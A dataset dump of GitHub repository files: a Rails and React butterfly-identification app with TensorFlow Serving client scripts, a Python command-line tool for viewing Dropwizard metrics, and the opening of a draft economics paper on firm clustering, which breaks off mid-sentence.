repo_name | repo_url | snapshot_id | revision_id | directory_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_created_at | gha_updated_at | gha_pushed_at | gha_language | files | num_files
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Camp-Butterfly/backend | https://github.com/Camp-Butterfly/backend | 1e22203aa6dd2b68ea5126e5c9d58051d3f05fd0 | b2e1daee8d85a4b5b1278ffcfefd991a2137364e | f985c97f476a1d76dd03a79d7939cb2a37a07b22 | refs/heads/master | 2023-01-24T20:40:32.772110 | 2019-12-17T17:13:12 | 2019-12-17T17:13:12 | 212,698,411 | 0 | 0 | null | 2019-10-03T23:14:29 | 2019-12-17T17:57:17 | 2023-01-19T15:27:19 | Ruby | [
{
"alpha_fraction": 0.7189014554023743,
"alphanum_fraction": 0.723747968673706,
"avg_line_length": 22.80769157409668,
"blob_id": "fa29520b29197a5f360d8d62beb808205571901c",
"content_id": "8a45676ff9938fe485b60be28ff1f904051f86ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 26,
"path": "/app/controllers/api/v1/butterflies_controller.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Api::V1::ButterfliesController < Api::V1::BaseController\n def index\n #respond_with Butterfly.all\n respond_with Butterfly.find_by(butterfly_name: params[:butterfly_name])\n end\n\n def create\n respond_with :api, :v1, Butterfly.create(butterfly_params)\n end\n\n def destroy\n respond_with Butterfly.destroy(params[:id])\n end\n\n def update\n butterfly = Butterfly.find(params[\"id\"])\n butterfly.update_attributes(butterfly_params)\n respond_with butterfly, json: butterfly\n end\n\n private\n\n def butterfly_params\n params.require(:butterfly).permit(:id, :butterfly_name, :description)\n end\nend\n"
},
{
"alpha_fraction": 0.568493127822876,
"alphanum_fraction": 0.568493127822876,
"avg_line_length": 18.954545974731445,
"blob_id": "e70efa353cfbe508b7b24550788e8235b6b603e7",
"content_id": "9dbeecb6f29de1cccad7b062edc896d6eadf34ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 22,
"path": "/client/src/containers/ButterflyContainer.js",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react'\n// import './Query.css';\n\nclass Query extends Component {\n\n render() {\n\n\n return (\n <div className=\"query\">\n <div>Butterfly Name: {this.props.data.image_content} </div>\n <br/>\n <div>Scientific Name: {this.props.data.latitude} </div>\n <br/>\n <div>Image file name: {this.props.data.longitude} </div>\n\n </div>\n );\n }\n}\n\nexport default Query;"
},
{
"alpha_fraction": 0.8500000238418579,
"alphanum_fraction": 0.8500000238418579,
"avg_line_length": 19,
"blob_id": "cec3e305058b24524e15c60251fc9f6d767c1544",
"content_id": "9405a097cafe5c9731145e65bd43256f26546a94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 2,
"path": "/app/models/butterfly.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Butterfly < ApplicationRecord\nend\n"
},
{
"alpha_fraction": 0.7890625,
"alphanum_fraction": 0.7890625,
"avg_line_length": 31,
"blob_id": "09b3fe53381f25524fe487692a7047ef5ff80c60",
"content_id": "509c4b31c017638319d9bee08263364efb6567a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 128,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 4,
"path": "/app/models/application_record.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class ApplicationRecord < ActiveRecord::Base\n # mount_uploader :image_file_name, ImageUploader\n self.abstract_class = true\nend\n"
},
{
"alpha_fraction": 0.7021858096122742,
"alphanum_fraction": 0.7049180269241333,
"avg_line_length": 22.612903594970703,
"blob_id": "21f358d60a1c10aa6b43dc03c22be27e75ad7c10",
"content_id": "510acc8220846a72d75182953dbb01499c833286",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 732,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 31,
"path": "/app/controllers/api/v1/images_controller.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Api::V1::ImagesController < Api::V1::BaseController\n\n# endpoint to retrieve all images stored in database.\n def index\n respond_with Image.all\n #respond_with Image.find params[:id]\n end\n\n# endpoint to create and classify image that runs a python script \n# to classify image using hosted docker container\n def create\n # creates new image in database \n Image.create(image_params)\n end\n\n def destroy\n respond_with Image.destroy(params[:id])\n end\n\n def update\n image = Image.find(params[\"id\"])\n image.update_attributes(image_params)\n respond_with image, json: image\n end\n\n private\n\n def image_params\n params.require(:image).permit(:id, :image_content, :longitude, :latitude)\n end\nend\n"
},
{
"alpha_fraction": 0.6721068024635315,
"alphanum_fraction": 0.7069733142852783,
"avg_line_length": 25.940000534057617,
"blob_id": "bb6c9f40e178469b868ff635226aa0876f792128",
"content_id": "aff161a18df66e86aed1bc0dc276e473ea037d8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1348,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 50,
"path": "/app/controllers/api/v1/grpc_client_EDIT.py",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\n\nimport grpc\nimport numpy as np\nimport requests\nimport tensorflow as tf\nimport os\n\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_service_pb2_grpc\nfrom tensorflow.keras.preprocessing import image\n \ndef main(channel):\n #Download image \n img = image.load_img(\"cabbage.jpg\", target_size=(150,150))\n img_tensor = image.img_to_array(img)\n img_tensor = np.expand_dims(img_tensor, axis=0)\n data = img_tensor\n\n print(data) \n\n options = [('grpc.min_reconnect_backoff_ms', 100)]\n channel = grpc.insecure_channel('192.168.99.100:8500', options=options)\n grpc.channel_ready_future(channel).result()\n stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)\n #send request\n request = predict_pb2.PredictRequest()\n request.model_spec.name = 'testmodel'\n request.model_spec.signature_name = 'serving_default'\n request.inputs['input_image'].CopyFrom(\n tf.make_tensor_proto(data,shape=[1,150,150,3])\n )\n result = stub.Predict(request, 100.0)\n #channel.close()\n print(result)\n\n print('\\n')\n\n print(floats)\n floats = np.array(list(result.outputs['dense_1/Softmax:0'].float_val)) \n max_ = 0\n for i in range(0,3):\n if floats[i] > floats[max_]:\n max_ = i\n print(max_)\n\n return channel\n\nif __name__ == '__main__':\n tf.compat.v1.app.run()\n\n"
},
{
"alpha_fraction": 0.4348171651363373,
"alphanum_fraction": 0.4364069998264313,
"avg_line_length": 22.735849380493164,
"blob_id": "a0cda93311830496f7521e99a8555bd142d8020d",
"content_id": "c747da25f9760dfb095d38e602e3a405be3b6fda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1258,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 53,
"path": "/client/src/App.js",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react';\nimport './App.css';\nimport SearchForm from './forms/SearchForm.js';\nimport ButterflyForm from './forms/ButterflyForm.js';\nimport ImageForm from './forms/ImageForm.js'\nimport {\n BrowserRouter as Router,\n Switch,\n Route,\n Link\n} from \"react-router-dom\";\n\n\nclass App extends Component {\n render() {\n return (\n <div className=\"App\">\n <header className=\"App-header\">\n <h2>Camp Butterfly</h2>\n </header>\n <Router>\n <ul>\n <li>\n <Link to=\"/\">Home</Link>\n </li>\n <li>\n <Link to=\"/add\">Add</Link>\n </li>\n <li>\n <Link to=\"/gallery\">Gallery</Link>\n </li>\n </ul>\n <Switch>\n {/* Home Page */}\n <Route exact path=\"/\">\n <SearchForm />\n </Route>\n {/* Add Butterfly */}\n <Route path=\"/add\">\n <ButterflyForm />\n </Route>\n {/* Add Image */}\n <Route exact path=\"/gallery\">\n <ImageForm/>\n </Route>\n </Switch>\n </Router>\n </div>\n );\n }\n}\n\nexport default App;\n"
},
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.773809552192688,
"avg_line_length": 27,
"blob_id": "80fa31e2c75b733d86b79801440316c97059fa0d",
"content_id": "a41f86fefb40390ed9d0887f541edfdd460ca13c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 84,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 3,
"path": "/app/controllers/api/v1/base_controller.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Api::V1::BaseController < ApplicationController\n respond_to :html, :json\nend\n"
},
{
"alpha_fraction": 0.8015872836112976,
"alphanum_fraction": 0.8015872836112976,
"avg_line_length": 30.5,
"blob_id": "31e5bf5c87fe77b72bada097118904d43cceb9bc",
"content_id": "95c13dbf9383ff9703d140f7e43fa6c6d5f81ccc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 4,
"path": "/app/models/image.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "class Image < ApplicationRecord\n\t# use ImageUploader for file upload in this model\n\t#mount_uploader :image, ImageUploader\nend\n"
},
{
"alpha_fraction": 0.4644850194454193,
"alphanum_fraction": 0.47412481904029846,
"avg_line_length": 25.280000686645508,
"blob_id": "602f1d60acccdcb0f5cd615abf6b1379f27bd869",
"content_id": "9d692fec8314a82abc85f62d728a0f3a613ac951",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3942,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 150,
"path": "/client/src/forms/ImageForm.js",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react'\nimport '../App.css';\nimport axios from 'axios';\n\n// for adding any image\n\nclass GalleryForm extends Component {\n constructor(props) {\n super(props);\n this.state = {\n image_content: '',\n latitude: '',\n longitude: ''\n };\n this.updateImage = this.updateImage.bind(this);\n this.addImage = this.addImage.bind(this);\n }\n\n updateImage(event) {\n const target = event.target;\n let value = target.value;\n\n const name = target.name;\n this.setState({\n [name]: value\n });\n // console.log(\"pathname\");\n // console.log(value.readAsDataURL);\n // var filename = value.replace(/^.*\\\\/, \"\");\n // console.log(filename);\n }\n\n async addImage(event) {\n event.preventDefault();\n \n // map props to image object\n let new_image = { \n \"image_content\": this.state.image_content,\n \"longitude\": this.state.longitude,\n \"latitude\": this.state.latitude,\n };\n let response = ''\nconsole.log(new_image);\n //await axios.post(\"http://enigmatic-spire-53426.herokuapp.com/api/v1/images?\", new_image)\n //await axios.post(\"https://serene-wildwood-86252.herokuapp.com/api/v1/model\", new_image)\n await axios.post(\"http://127.0.0.1:5000/api/v1/model\", new_image)\n .then(result => {\n // this.setState({result:result.data});\n response = result.data\n console.log(result.data);\n })\n .catch(error => {\n if(error.response) {\n console.log(error.response);\n }\n });\n let id = ''\n // check id of response\n if (response === 0) {\n id = 'cabbage'\n }\n else if (response === 1) {\n id = 'ringlet'\n }\n else if (response === 2) {\n id = 'sulphur'\n }\n else if (response === 3) {\n id = 'milkweed'\n }\n else {\n id = 'none'\n //this.setState({result: id})\n }\n\n // conditional Query the backend API for the database\n if(id != 'none') {\n //let search = \"http://localhost:3001/api/v1/butterflies.json/\";\n let search = \"https://enigmatic-spire-53426.herokuapp.com/api/v1/butterflies.json/\";\n axios.get(search, {\n params: {\n butterfly_name: id\n }\n })\n .then(result => {\n this.setState({result:result.data});\n console.log(result.data);\n }); \n } \n }\n\n// basic add image form\n render() {\n return (\n <form className=\"add-form\">\n <label>\n Add Image:\n </label>\n <br/>\n <label>\n Image Content:\n </label>\n <input\n className=\"name\"\n type=\"string\"\n name=\"image_content\"\n value={this.state.value}\n onChange={this.updateImage}\n />\n <label>\n <br/>\n Longitude:\n </label>\n {/*<input\n className=\"name\"\n type=\"file\"\n name=\"longitude\"\n value={this.state.value}\n onChange={this.updateImage}\n />*/}<input\n className=\"name\"\n type=\"string\"\n name=\"longitude\"\n value={this.state.value}\n onChange={this.updateImage}\n />\n <br/>\n <label>\n Latitude:\n </label>\n <input\n className=\"name\"\n type=\"string\"\n name=\"latitude\"\n value={this.state.value}\n onChange={this.updateImage}\n />\n <br/>\n <button \n className=\"submit-button\"\n onClick={this.addImage}>\n Submit\n </button>\n </form>\n\n );\n }\n}\n\nexport default GalleryForm;\n"
},
{
"alpha_fraction": 0.6353383660316467,
"alphanum_fraction": 0.6372180581092834,
"avg_line_length": 30.294116973876953,
"blob_id": "3283147ec53dd262af5edb17f998c4fd668a9030",
"content_id": "aec27289047e8dc57c7ec266ee9b8352f50cc610",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 17,
"path": "/config/routes.rb",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "Rails.application.routes.draw do\n if Rails.env.development?\n mount GraphiQL::Rails::Engine, at: \"/graphiql\", graphql_path: \"/graphql\"\n end\n post \"/graphql\", to: \"graphql#execute\"\n\tnamespace :api do\n\t\tnamespace :v1 do\n\t\t# defines REST actions for images and butterflies\n # => GET, index\n # => POST, create\n # => DELETE, destroy\n # => PUT, update\n \tresources :images, only: [:index, :create, :destroy, :update]\n \tresources :butterflies, only: [:index, :create, :destroy, :update]\n \tend\n\tend\nend\n"
},
{
"alpha_fraction": 0.6736353039741516,
"alphanum_fraction": 0.7137050032615662,
"avg_line_length": 32.096153259277344,
"blob_id": "f3ffac67884907fce28414eb169c73b7504407f5",
"content_id": "498b01cce1967b92fe9eebf445660f60c9d0f2f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1722,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 52,
"path": "/app/controllers/api/v1/grpc_client_EDIT-1.py",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "#from __future__ import print_function\n\nimport grpc\nimport numpy as np\nimport requests\nimport tensorflow as tf\nimport os\n\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_service_pb2_grpc\nfrom tensorflow.keras.preprocessing import image\n\ndef main(channel):\n\n # Download image \n img = image.load_img(\"cabbage.jpg\", target_size=(150,150))\n # map to tensor array\n img_tensor = image.img_to_array(img)\n # Assign dimensions\n img_tensor = np.expand_dims(img_tensor, axis=0)\n # pass into workable variable\n data = img_tensor\n # mapped image\n print(data) \n \n # establish channel to docker image container\n # local container\n #channel = grpc.insecure_channel('192.168.99.100:8500') #local IP, testmodel, input_image\n #channel = grpc.insecure_channel('34.68.117.217:8500') #test2, test2, input_image\n channel = grpc.insecure_channel('35.193.112.218:8500') #model, model, conv2d_input\n grpc.channel_ready_future(channel).result()\n # create variable for service that sends object to channel\n stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)\n # assign values to props of request\n request = predict_pb2.PredictRequest()\n # local container\n #request.model_spec.name = 'testmodel'\n #request.model_spec.name = 'test2'\n request.model_spec.name = 'model'\n request.model_spec.signature_name = 'serving_default'\n request.inputs['conv2d_input'].CopyFrom(\n \ttf.make_tensor_proto(data,shape=[1,150,150,3])\n )\n #send request to docker image container\n result = stub.Predict(request,10.0)\n # response from model\n print(result)\n\n\n# creates python executable\nif __name__ == '__main__':\n tf.compat.v1.app.run()\n\n"
},
{
"alpha_fraction": 0.6369400024414062,
"alphanum_fraction": 0.6475063562393188,
"avg_line_length": 19.19658088684082,
"blob_id": "ca89bdf4670889b6dec3c02f30a16feed4a32d8f",
"content_id": "8e9c66791f7700967d540afb6a60a85145dbf59d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2366,
"license_type": "no_license",
"max_line_length": 182,
"num_lines": 117,
"path": "/README.md",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "## DOCUMENTATION \n\n#### __installation steps for frontend__\n\npackage manager:\n\t\n`brew install yarn`\n\njavascript packages:\n\t\n`brew install node`\n\ntracks changes in development:\n\t\n`brew install watchman`\n\n`brew tap AdoptOpenJDK/openjdk`\n\n`brew cask install adoptopenjdk8`\n\ncommand-line-tools for react-native:\n\t\n`npm install -g react-native-cli`\n\nstart development server:\n\n`react-native run-ios`\n\n\n#### __installation steps for backend__\n\nRuby on Rails application that provides a backend API for the application.\n\nIf Ruby is not installed on your machine, you can follow DigitalOcean's walkthrough: https://www.digitalocean.com/community/tutorials/how-to-install-ruby-on-rails-with-rbenv-on-macos\n\ncd into _/backend_ directory and run the following commands:\n\n_sets up backend_\n\n`rake db:setup`\n\n_create postgres models_\n\n`rails db:migrate`\n\n_insert seed data into local backend server_\n\n`rake db:seed`\n\n_start development server_\n\n`rails server`\n\nif you visit `http://localhost:3001` in any browser, the default homepage of ruby on rails should be visible.\n\n#### POST\n\n```\n\turl: \"http://localhost:3001/api/v1/images\",\n\ttype: \"POST\",\n\tdata: { image: { image_name: name, butterfly_name: b_name, location: location }\t}\n\tsuccess: response => {\n\t}\n```\n\n```\n\turl: \"http://localhost:3001/api/v1/butterflies\",\n\ttype: \"POST\",\n\tdata: { butterfly: { butterfly_name: b_name, scientific_name: s_name, image_file_name: i_name, description: desc }\t}\n\tsuccess: response => {\n\t}\n```\n\n#### GET\n\n```\n\t.getJSON(\"http://localhost:3001/api/v1/images.json\", (response) => { this.setState({ butterflies: response})\t});\n\t\n\t.getJSON(\"http://localhost/api/v1/butterflies.json\", (response) => { this.setState({ butterflies: response})\t});\n```\n\n#### DELETE\n\n```\n\turl: `/api/v1/images/${id}`,\n type: 'DELETE',\n success(response) {\n console.log('successfully removed item')\n }\n```\n\n\n```\n\turl: `/api/v1/butterflies/${id}`,\n type: 'DELETE',\n success(response) {\n console.log('successfully removed item')\n }\n```\n\n#### UPDATE\n\n```\n\turl: `/api/v1/images/${id}`,\n type: 'PUT',\n success(response) {\n console.log('successfully removed item')\n }\n```\n\n```\n\turl: `/api/v1/butterflies/${id}`,\n type: 'PUT',\n success(response) {\n console.log('successfully removed item')\n }\n```\n\n\n\n"
},
{
"alpha_fraction": 0.4745003581047058,
"alphanum_fraction": 0.4765678942203522,
"avg_line_length": 25.381818771362305,
"blob_id": "d7865bca773c0df42b7dc5ff68f09d026abe34dc",
"content_id": "ee29f053556b53e7175b03f5e1c336c6c0618485",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2902,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 110,
"path": "/client/src/forms/ButterflyForm.js",
"repo_name": "Camp-Butterfly/backend",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react'\nimport '../App.css';\nimport axios from 'axios';\n\n// for adding a butterfly type\n\nclass AddForm extends Component {\n constructor(props) {\n super(props);\n this.state = {\n butterfly_name:'',\n scientific_name:'',\n image_file_name:'',\n description:''\n };\n this.updateItem = this.updateItem.bind(this);\n this.addItem = this.addItem.bind(this);\n }\n\n// updates component's object key-value pairs\n updateItem(event) {\n const target = event.target;\n const value = target.value;\n const name = target.name;\n this.setState({\n [name]: value\n });\n }\n\n// matches state params to object to be sent to server\n async addItem(event) {\n event.preventDefault();\n\n let new_butterfly = {\n \"butterfly_name\": this.state.butterfly_name,\n \"scientific_name\": this.state.scientific_name,\n \"image_file_name\": this.state.image_file_name,\n \"description\": this.state.description\n };\n //let data = JSON.stringify(new_butterfly,null);\n await axios.post(\"http://enigmatic-badlands-58618.herokuapp.com/api/v1/butterflies\", new_butterfly)\n .catch(error => {\n if(error.response) {\n console.log(error.response);\n }\n });\n }\n\n// basic add butterfly form\n render() {\n return (\n <form className=\"add-form\">\n <label>\n Add Butterfly:\n </label>\n <br/>\n <label>\n Butterfly name:\n </label>\n <input\n className=\"name\"\n type=\"string\"\n name=\"butterfly_name\"\n value={this.state.value}\n onChange={this.updateItem}\n />\n <label>\n Scientific name:\n </label>\n <input\n className=\"name\"\n type=\"string\"\n name=\"scientific_name\"\n value={this.state.value}\n onChange={this.updateItem}\n />\n <label>\n <br/>\n Attach Image:\n </label>\n <input\n className=\"name\"\n type=\"file\"\n name=\"attachment\"\n value={this.state.value}\n onChange={this.updateImage}\n />\n <br/>\n <label>\n Description\n </label>\n <input\n className=\"name\"\n type=\"text\"\n name=\"description\"\n value={this.state.value}\n onChange={this.updateItem}\n />\n <br/>\n <button \n className=\"submit-button\"\n onClick={this.addItem}>\n Submit\n </button>\n </form>\n );\n }\n}\n\nexport default AddForm;\n"
}
] | 14 |
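The README and `ImageForm.js` in the row above together describe the client flow for this backend: post an image record, map the classifier's integer response to a butterfly name, then query the butterflies endpoint by that name. The sketch below illustrates that round trip in Python; the `localhost:3001` host and the index-to-name mapping are taken from the repo's README and `ImageForm.js`, while the use of `requests` and the helper names are illustrative assumptions, not part of the repo.

```python
# Hypothetical client for the Camp-Butterfly API described above.
# Endpoints and the class-index mapping mirror README.md and
# client/src/forms/ImageForm.js; the helper names are made up here.
import requests

BASE = "http://localhost:3001/api/v1"  # development server from the README
CLASS_NAMES = {0: "cabbage", 1: "ringlet", 2: "sulphur", 3: "milkweed"}

def add_image(image_content, longitude, latitude):
    # POST /images creates a record via Api::V1::ImagesController#create
    payload = {"image": {"image_content": image_content,
                         "longitude": longitude, "latitude": latitude}}
    return requests.post(f"{BASE}/images", json=payload)

def lookup_butterfly(class_index):
    # Map the classifier output to a name, as ImageForm.js does, then hit
    # the index action, which calls Butterfly.find_by(butterfly_name: ...)
    name = CLASS_NAMES.get(class_index)
    if name is None:
        return None
    resp = requests.get(f"{BASE}/butterflies.json",
                        params={"butterfly_name": name})
    resp.raise_for_status()
    return resp.json()
```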
burakdd/dwtop | https://github.com/burakdd/dwtop | 1a2da87d84b17c11dd2fab5e387fde6f85e336fc | 0894715c82e587a3e8abe9b3894196eb4d8f2258 | 5f74bb8804db2f0d7e8ec2accec18f9af66dc605 | refs/heads/master | 2016-03-31T01:57:33.694590 | 2015-08-02T19:35:10 | 2015-08-02T19:35:10 | 40,089,391 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.676886796951294,
"alphanum_fraction": 0.676886796951294,
"avg_line_length": 31.615385055541992,
"blob_id": "7165d2e43f09d96d9c6276e8d842d5cf71b51de1",
"content_id": "bb97ea6141317e1b2999fb5699045b954a8598e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 848,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 26,
"path": "/README.md",
"repo_name": "burakdd/dwtop",
"src_encoding": "UTF-8",
"text": "Dwtop\n===\n[](https://travis-ci.org/burakdd/dwtop)\n\nDwtop is a simple command line tool for accessing your dropwizard metrics output and watch it in realtime.\n\nUsage\n===\n\n\tdwtop.py [-h] [--version] [--gauges] [--counters] [--histograms]\n\t [--meters] [--timers]\n\t hostname\n\t\n\tShow various outputs in real time from metrics server\n\t\n\tpositional arguments:\n\t hostname Hostname of the metrics server\n\t\n\toptional arguments:\n\t -h, --help show this help message and exit\n\t --version show version of metrics library\n\t --gauges show gauges data from metrics\n\t --counters show counters data from metrics\n\t --histograms show metrics histograms\n\t --meters show meters from metrics\n\t --timers show timers info from metrics\n"
},
{
"alpha_fraction": 0.5624306201934814,
"alphanum_fraction": 0.564927875995636,
"avg_line_length": 26.945735931396484,
"blob_id": "eed5ab274ca060a17de427b53d1771cbea48a72b",
"content_id": "700219e598bb00bbe82ea26807b6e62bbac6959b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3604,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 129,
"path": "/dwtop.py",
"repo_name": "burakdd/dwtop",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\nimport argparse\nimport urllib.request\nimport json\n\n\nclass DwNode:\n def __init__(self, hostname):\n self.hostname = hostname\n\n def __str__(self):\n return \"%s\\n\".format(self.hostname)\n\n def get_metrics_url(self):\n return \"\".join([self.hostname, \":\", \"8081\", \"/\", \"metrics\"])\n\n\nclass Metrics:\n def __init__(self, gauges, counters, histograms, meters, timers):\n self.gauges = gauges\n self.counters = counters\n self.histograms = histograms\n self.meters = meters\n self.timers = timers\n\n\ndef parse_cmd_args():\n \"\"\"\n Form some positional arguments and optional ones\n Parse them and form prerequisite objects\n :return:\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Show various outputs in real time from metrics server\")\n # only required argument\n parser.add_argument(\"hostname\", help=\"Hostname of the metrics server\")\n\n # below are all optional\n parser.add_argument(\"--version\",\n action=\"store_true\",\n help=\"show version of metrics library\")\n parser.add_argument(\"--gauges\",\n action=\"store_true\",\n help=\"show gauges data from metrics\")\n parser.add_argument(\"--counters\",\n action=\"store_true\",\n help=\"show counters data from metrics\")\n parser.add_argument(\"--histograms\",\n action=\"store_true\",\n help=\"show metrics histograms\")\n parser.add_argument(\"--meters\",\n action=\"store_true\",\n help=\"show meters from metrics\")\n parser.add_argument(\"--timers\",\n action=\"store_true\",\n help=\"show timers info from metrics\")\n\n global args\n args = parser.parse_args()\n\n global node\n node = DwNode(args.hostname)\n\n\ndef get_metrics():\n \"\"\"\n Just make the actual request and parse json\n :return:\n \"\"\"\n global node\n metrics_url = node.get_metrics_url()\n with urllib.request.urlopen(metrics_url) as request:\n response_json = request.read()\n response_dict = json.loads(response_json.decode())\n global metrics\n metrics = Metrics(gauges=response_dict[\"gauges\"],\n timers=response_dict[\"timers\"],\n counters=response_dict[\"counters\"],\n histograms=response_dict[\"histograms\"],\n meters=response_dict[\"meters\"])\n\n\ndef print_gauges():\n for key in metrics.gauges:\n print(key, metrics.gauges[key][\"value\"], sep=\" => \")\n\n\ndef print_timers():\n for timer in metrics.timers:\n print(timer)\n print(\"=\" * 50)\n for key in metrics.timers[timer]:\n print(key, metrics.timers[timer][key], sep=\" => \")\n\n\ndef print_counters():\n for counter in metrics.counters:\n print(counter, metrics.counters[counter][\"count\"], sep=\" => \")\n\n\ndef print_histograms():\n pass\n\n\ndef print_meters():\n for meter in metrics.meters:\n print(meter)\n print(\"=\" * 50)\n for meter_type in metrics.meters[meter]:\n print(meter_type, metrics.meters[meter][meter_type], sep=\" => \")\n print(\"\\n\")\n\n\ndef pretty_print():\n if args.gauges:\n print_gauges()\n if args.timers:\n print_timers()\n if args.counters:\n print_counters()\n if args.histograms:\n pass\n if args.meters:\n print_meters()\n\n\nif __name__ == \"__main__\":\n parse_cmd_args()\n get_metrics()\n pretty_print()"
}
] | 2 |
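`dwtop.py` in the row above assembles its target URL as `<hostname>:8081/metrics` and unpacks the response JSON into gauges, counters, histograms, meters, and timers. Below is a stripped-down sketch of that fetch-and-parse step using only the standard library, as the script itself does; the hostname value is a placeholder and must include a scheme for `urllib` to accept it.

```python
# Minimal sketch of dwtop's fetch step: pull the Dropwizard metrics JSON
# from <hostname>:8081/metrics, mirroring DwNode.get_metrics_url above.
import json
import urllib.request

hostname = "http://localhost"  # placeholder; dwtop takes this as an argument
url = f"{hostname}:8081/metrics"

with urllib.request.urlopen(url) as resp:
    metrics = json.loads(resp.read().decode())

# the payload has the five top-level sections the Metrics class expects
for section in ("gauges", "counters", "histograms", "meters", "timers"):
    print(section, len(metrics.get(section, {})), sep=" => ")
```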
iamlemec/landsat | https://github.com/iamlemec/landsat | 68023afd06e8b33abbd008561131ef372fc024a8 | df7a64487817607252b7fda310ebad21f38b27a8 | f6e5598bbd6c6d3b6546200ccb4875bee956c920 | refs/heads/master | 2021-06-23T20:37:11.751058 | 2020-12-07T16:29:04 | 2020-12-07T16:29:04 | 169,110,668 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.7940738797187805,
"alphanum_fraction": 0.8136246800422668,
"avg_line_length": 135.87962341308594,
"blob_id": "efa6b8da6fb538b19746bcd28a0c837859d54f27",
"content_id": "d1b29463c6020ec296e6f851b3bb16b2184cf33d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14782,
"license_type": "no_license",
"max_line_length": 1358,
"num_lines": 108,
"path": "/draft/draft.md",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "#! Geographic Clustering of Firms: A Machine Learning Approach\n\nDouglas Hanley (University of Pittburgh)\nChengying Luo (University of Pittburgh)\nMingqin Wu (South China Normal University)\n\n# Abstract\n\nUnderstanding how the geographic arrangement of firms affects outcomes such as productivity and growth is a widely studied question in economics. Much of the literature has focused on constructing statistics that characterize firm clustering and using these as inputs into traditional regression analysis. In this paper, we use techniques developed in the field of machine learning (ML) to tackle this question. In particular, we employ convolutional neural networks (CNN) that are widely used in image classification tasks and apply them to the firm density maps considered in our setting. Using state-of-the-art techniques and tools from ML on comprehensive Chinese firm data, we find that such an approach has predictive power over and above traditional techniques. We investigate methods of interpreting such a complex algorithms analogous to the impulse response approach used with DSGE models. Additionally, we explore ways to account for confounding factors such as industry in our analysis, as well as to deal with issues of endogeneity of firm location choice through the use of instrumental variables.\n\n# Introduction\n\nThe spatial arrangement of firms is known to be a critical factor influencing a variety of firm level outcomes. Numerous existing studies have investigated the importance of firm density and localization at various spatial scales, as well as agglomeration by industry. In this paper, we bring relatively new data and techniques to bear on the issue.\n\nRegarding the data, we use a 